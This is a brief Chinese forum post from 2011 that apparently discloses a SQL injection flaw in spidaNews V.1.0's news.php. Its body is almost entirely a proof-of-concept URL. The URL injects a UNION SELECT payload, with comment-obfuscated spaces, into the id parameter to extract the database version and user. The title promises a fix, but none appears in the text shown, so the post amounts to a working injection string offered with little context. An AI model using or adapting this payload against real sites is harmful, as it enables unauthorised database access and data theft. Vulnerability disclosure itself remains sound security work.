oma 发表于 2011-12-20 09:47

spidaNews V.1.0 注入漏洞及修复(news.php)

<P>#proof of concept<BR><A href="http://localhost/spidaNews/news.php?id=%27/**/+union+/**/select/**/+1,2,3"><FONT color=#0000ff>http://localhost/spidaNews/news.php?id=%27/**/+union+/**/select/**/+1,2,3</FONT></A><BR>,version(),user(),6/**/--+</P>
<DIV></DIV>
页: [1]
查看完整版本: spidaNews V.1.0 注入漏洞及修复(news.php)